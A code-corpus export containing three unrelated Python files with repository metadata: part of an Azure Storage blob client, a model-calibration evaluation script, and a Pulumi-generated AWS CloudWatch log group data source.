Specify this conditional header to copy the blob only
if the destination blob has not been modified since the specified
date/time. If the destination blob has been modified, the Blob service
returns status code 412 (Precondition Failed).
:param ETag destination_if_match:
An ETag value, or the wildcard character (*). Specify an ETag value for
this conditional header to copy the blob only if the specified ETag value
matches the ETag value for an existing destination blob. If the ETag for
the destination blob does not match the ETag specified for If-Match, the
Blob service returns status code 412 (Precondition Failed).
:param ETag destination_if_none_match:
An ETag value, or the wildcard character (*). Specify an ETag value for
this conditional header to copy the blob only if the specified ETag value
does not match the ETag value for the destination blob. Specify the wildcard
character (*) to perform the operation only if the destination blob does not
exist. If the specified condition isn't met, the Blob service returns status
code 412 (Precondition Failed).
:param str destination_lease_id:
The lease ID specified for this header must match the lease ID of the
destination blob. If the request does not include the lease ID or it is not
valid, the operation fails with status code 412 (Precondition Failed).
:param str source_lease_id:
Specify this to perform the Copy Blob operation only if
the lease ID given matches the active lease ID of the source blob.
:param int timeout:
The timeout parameter is expressed in seconds.
:param PageBlobTier premium_page_blob_tier:
A page blob tier value to set on the destination blob. The tier correlates to
the size of the blob and number of allowed IOPS. This is only applicable to
page blobs on premium storage accounts.
If the tier on the source blob is larger than the tier being passed to this
copy operation or if the size of the blob exceeds the tier being passed to
this copy operation then the operation will fail.
:return: Copy operation properties such as status, source, and ID.
:rtype: :class:`~azure.storage.blob.models.CopyProperties`
'''
return self._copy_blob(container_name, blob_name, copy_source,
metadata, premium_page_blob_tier,
source_if_modified_since, source_if_unmodified_since,
source_if_match, source_if_none_match,
destination_if_modified_since,
destination_if_unmodified_since,
destination_if_match,
destination_if_none_match,
destination_lease_id,
source_lease_id, timeout,
False)
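    # Illustrative usage sketch, not part of the library: starts an asynchronous
    # copy and polls its status through get_blob_properties, as described above.
    # The account, container and blob names are placeholders.
    #
    #     source_url = 'https://myaccount.blob.core.windows.net/mycontainer/source.vhd'
    #     copy = service.copy_blob('mycontainer', 'dest.vhd', source_url)
    #     while copy.status == 'pending':
    #         copy = service.get_blob_properties('mycontainer', 'dest.vhd').properties.copy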
# -----Helper methods-----------------------------------------------------
def _create_blob(
self, container_name, blob_name, content_length, content_settings=None,
sequence_number=None, metadata=None, lease_id=None, premium_page_blob_tier=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None,
encryption_data=None):
'''
See create_blob for more details. This helper method
allows for encryption or other such special behavior because
it is safely handled by the library. These behaviors are
prohibited in the public version of this function.
:param str encryption_data:
The JSON formatted encryption metadata to upload as a part of the blob.
            This should only be passed internally from other methods, and should only be
            applied when the entire blob contents are uploaded immediately after the blob is created.
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('content_length', content_length)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {'timeout': _int_to_str(timeout)}
request.headers = {
'x-ms-blob-type': _to_str(self.blob_type),
'x-ms-blob-content-length': _to_str(content_length),
'x-ms-lease-id': _to_str(lease_id),
'x-ms-blob-sequence-number': _to_str(sequence_number),
'x-ms-access-tier': _to_str(premium_page_blob_tier),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match)
}
_add_metadata_headers(metadata, request)
if content_settings is not None:
request.headers.update(content_settings._to_headers())
if encryption_data is not None:
request.headers['x-ms-meta-encryptiondata'] = encryption_data
return self._perform_request(request, _parse_base_properties)
def _update_page(
self, container_name, blob_name, page, start_range, end_range,
validate_content=False, lease_id=None, if_sequence_number_lte=None,
if_sequence_number_lt=None, if_sequence_number_eq=None,
if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
See update_page for more details. This helper method
allows for encryption or other such special behavior because
it is safely handled by the library. These behaviors are
prohibited in the public version of this function.
'''
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'page',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-page-write': 'update',
'x-ms-lease-id': _to_str(lease_id),
'x-ms-if-sequence-number-le': _to_str(if_sequence_number_lte),
'x-ms-if-sequence-number-lt': _to_str(if_sequence_number_lt),
'x-ms-if-sequence-number-eq': _to_str(if_sequence_number_eq),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match)
}
_validate_and_format_range_headers(
request,
start_range,
end_range,
align_to_page=True)
request.body = _get_data_bytes_only('page', page)
if validate_content:
computed_md5 = _get_content_md5(request.body)
request.headers['Content-MD5'] = _to_str(computed_md5)
return self._perform_request(request, _parse_page_properties)
| 53.880499
| 118
| 0.654716
|
7f8bb0d4ca1c87794dcdfd2f043b728d54955e42
| 4,380
|
py
|
Python
|
eval/eval_calibration.py
|
dallascard/ACT
|
af3b88a89153d66dc421932c2abbf3792d7a1c37
|
[
"Apache-2.0"
] | null | null | null |
eval/eval_calibration.py
|
dallascard/ACT
|
af3b88a89153d66dc421932c2abbf3792d7a1c37
|
[
"Apache-2.0"
] | null | null | null |
eval/eval_calibration.py
|
dallascard/ACT
|
af3b88a89153d66dc421932c2abbf3792d7a1c37
|
[
"Apache-2.0"
] | null | null | null |
from optparse import OptionParser
import numpy as np
# Evaluate the overall calibration of the output of a model
def main():
usage = "%prog output.npz [output2.npz ...]"
parser = OptionParser(usage=usage)
parser.add_option('-n', dest='n_bins', default=10,
help='Number of bins: default=%default')
parser.add_option('--exp', action="store_true", dest="exp", default=False,
help='Exponentiate the log-probs: default=%default')
parser.add_option('-v', action="store_true", dest="verbose", default=False,
help='Print details: default=%default')
(options, args) = parser.parse_args()
infiles = args
n_bins = int(options.n_bins)
verbose = options.verbose
adaptive = True
exp = options.exp
mae_vals = []
acc_vals = []
for infile in infiles:
acc, mae = eval_calibration_file(infile, n_bins=n_bins, adaptive=adaptive, verbose=verbose, exp=exp)
print(infile, "ACC = {:.5f}".format(acc))
print(infile, "MAE = {:.5f}".format(mae))
mae_vals.append(mae)
acc_vals.append(acc)
print("Mean ACC = {:.5f} ({:.5f})".format(np.mean(acc_vals), np.std(acc_vals)))
print("Mean MAE = {:.5f} ({:.5f})".format(np.mean(mae_vals), np.std(mae_vals)))
def eval_calibration_file(infile, n_bins=10, adaptive=True, verbose=False, exp=False):
data = np.load(infile)
labels = data['labels']
pred_probs = data['pred_probs']
if exp:
pred_probs = np.exp(pred_probs)
n_items, n_classes = pred_probs.shape
    # convert integer labels to a one-hot matrix if they are not already scattered
if len(labels.shape) == 1 or labels.shape[1] == 1:
temp = np.zeros((n_items, n_classes), dtype=int)
temp[np.arange(n_items), labels] = 1
labels = temp
mae = eval_calibration(labels, pred_probs, n_bins, adaptive, verbose)
acc = np.sum(labels.argmax(axis=1) == pred_probs.argmax(axis=1)) / float(n_items)
return acc, mae
def eval_calibration(label_matrix, pred_probs, n_bins=10, adaptive=True, verbose=False):
n_items, n_classes = label_matrix.shape
if n_classes > 2:
mae = 0.0
for c in range(n_classes):
if verbose:
print("Class {:d}".format(c))
mae += eval_calibration_by_class(label_matrix, pred_probs, col=c, n_bins=n_bins, adaptive=adaptive, verbose=verbose) / n_bins
else:
mae = eval_calibration_by_class(label_matrix, pred_probs, col=0, n_bins=n_bins, adaptive=adaptive, verbose=verbose)
return mae
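# The per-class quantity computed below is a binned calibration error: with B bins,
# MAE = (1/B) * sum over bins of |mean(pred_probs in bin) - mean(labels in bin)|.
# Adaptive binning places an (approximately) equal number of items in each bin,
# i.e. an equal-mass variant of expected calibration error, unweighted by bin size.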
def eval_calibration_by_class(labels, pred_probs, col=0, n_bins=10, adaptive=True, verbose=False):
n_items, n_classes = pred_probs.shape
order = np.argsort(pred_probs[:, col])
bin_size = n_items // n_bins
counts = []
lower_vals = []
label_means = []
probs_means = []
ae_vals = []
mae = 0.0
for i in range(n_bins):
if adaptive:
if i < n_bins-1:
indices = order[i * bin_size:(i+1) * bin_size]
else:
indices = order[i * bin_size:]
#probs = [pred_probs[index, col] for index in indices]
#lower = np.min(probs)
lower = np.min(pred_probs[indices, col])
counts.append(len(indices))
else:
lower = 1.0 / n_bins * i
upper = 1.0 / n_bins * (i+1)
if i < n_bins - 1:
indices = (pred_probs[:, col] >= lower) * (pred_probs[:, col] < upper)
else:
indices = (pred_probs[:, col] >= lower)
counts.append(indices.sum())
mean_probs = pred_probs[indices, col].mean()
mean_label = labels[indices, col].mean()
ae = np.abs(mean_probs - mean_label)
mae += ae
lower_vals.append(lower)
label_means.append(mean_label)
probs_means.append(mean_probs)
ae_vals.append(ae)
if verbose:
print('Bins:\t' + '\t'.join(['{:.3f}'.format(low) for low in lower_vals]))
print('Count:\t' + '\t'.join(['{:d}'.format(val) for val in counts]))
print('True:\t' + '\t'.join(['{:.3f}'.format(val) for val in label_means]))
print('Pred:\t' + '\t'.join(['{:.3f}'.format(val) for val in probs_means]))
print('AE:\t' + '\t'.join(['{:.3f}'.format(val) for val in ae_vals]))
return mae / n_bins
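# A small self-contained sanity check, not called by main(): on synthetic,
# perfectly calibrated predictions (labels sampled from the predicted
# probabilities), the binned calibration MAE should be close to zero.
# The function name and defaults are illustrative only.
def _synthetic_calibration_example(n_items=10000, seed=0):
    rng = np.random.RandomState(seed)
    probs_pos = rng.uniform(size=n_items)
    pred_probs = np.column_stack([probs_pos, 1.0 - probs_pos])
    labels_pos = (rng.uniform(size=n_items) < probs_pos).astype(int)
    label_matrix = np.column_stack([labels_pos, 1 - labels_pos])
    return eval_calibration(label_matrix, pred_probs, n_bins=10, adaptive=True)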
if __name__ == '__main__':
main()
| 34.21875
| 137
| 0.59589
|
3d6ee95973024ea6f79c10ef6c0e2d10f47f91b1
| 5,884
|
py
|
Python
|
sdk/python/pulumi_aws/cloudwatch/get_log_group.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/cloudwatch/get_log_group.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/cloudwatch/get_log_group.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetLogGroupResult',
'AwaitableGetLogGroupResult',
'get_log_group',
'get_log_group_output',
]
@pulumi.output_type
class GetLogGroupResult:
"""
A collection of values returned by getLogGroup.
"""
def __init__(__self__, arn=None, creation_time=None, id=None, kms_key_id=None, name=None, retention_in_days=None, tags=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if creation_time and not isinstance(creation_time, int):
raise TypeError("Expected argument 'creation_time' to be a int")
pulumi.set(__self__, "creation_time", creation_time)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kms_key_id and not isinstance(kms_key_id, str):
raise TypeError("Expected argument 'kms_key_id' to be a str")
pulumi.set(__self__, "kms_key_id", kms_key_id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if retention_in_days and not isinstance(retention_in_days, int):
raise TypeError("Expected argument 'retention_in_days' to be a int")
pulumi.set(__self__, "retention_in_days", retention_in_days)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def arn(self) -> str:
"""
The ARN of the Cloudwatch log group. Any `:*` suffix added by the API, denoting all CloudWatch Log Streams under the CloudWatch Log Group, is removed for greater compatibility with other AWS services that do not accept the suffix.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> int:
"""
The creation time of the log group, expressed as the number of milliseconds after Jan 1, 1970 00:00:00 UTC.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> str:
"""
The ARN of the KMS Key to use when encrypting log data.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="retentionInDays")
def retention_in_days(self) -> int:
"""
        The number of days log events are retained in the specified log group.
"""
return pulumi.get(self, "retention_in_days")
@property
@pulumi.getter
def tags(self) -> Mapping[str, str]:
"""
A map of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
class AwaitableGetLogGroupResult(GetLogGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetLogGroupResult(
arn=self.arn,
creation_time=self.creation_time,
id=self.id,
kms_key_id=self.kms_key_id,
name=self.name,
retention_in_days=self.retention_in_days,
tags=self.tags)
def get_log_group(name: Optional[str] = None,
tags: Optional[Mapping[str, str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetLogGroupResult:
"""
Use this data source to get information about an AWS Cloudwatch Log Group
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.cloudwatch.get_log_group(name="MyImportantLogs")
```
:param str name: The name of the Cloudwatch log group
:param Mapping[str, str] tags: A map of tags to assign to the resource.
"""
__args__ = dict()
__args__['name'] = name
__args__['tags'] = tags
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:cloudwatch/getLogGroup:getLogGroup', __args__, opts=opts, typ=GetLogGroupResult).value
return AwaitableGetLogGroupResult(
arn=__ret__.arn,
creation_time=__ret__.creation_time,
id=__ret__.id,
kms_key_id=__ret__.kms_key_id,
name=__ret__.name,
retention_in_days=__ret__.retention_in_days,
tags=__ret__.tags)
@_utilities.lift_output_func(get_log_group)
def get_log_group_output(name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Optional[Mapping[str, str]]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetLogGroupResult]:
"""
Use this data source to get information about an AWS Cloudwatch Log Group
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.cloudwatch.get_log_group(name="MyImportantLogs")
```
:param str name: The name of the Cloudwatch log group
:param Mapping[str, str] tags: A map of tags to assign to the resource.
"""
...
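# Illustrative sketch, not part of the generated API surface: using the output
# form of the data source when the log group name is itself an Output, e.g.
# produced by another resource. All names below are placeholders.
#
#     import pulumi
#     import pulumi_aws as aws
#
#     group = aws.cloudwatch.LogGroup("example", retention_in_days=14)
#     looked_up = aws.cloudwatch.get_log_group_output(name=group.name)
#     pulumi.export("log_group_arn", looked_up.apply(lambda g: g.arn))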
| 33.816092
| 238
| 0.64446
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.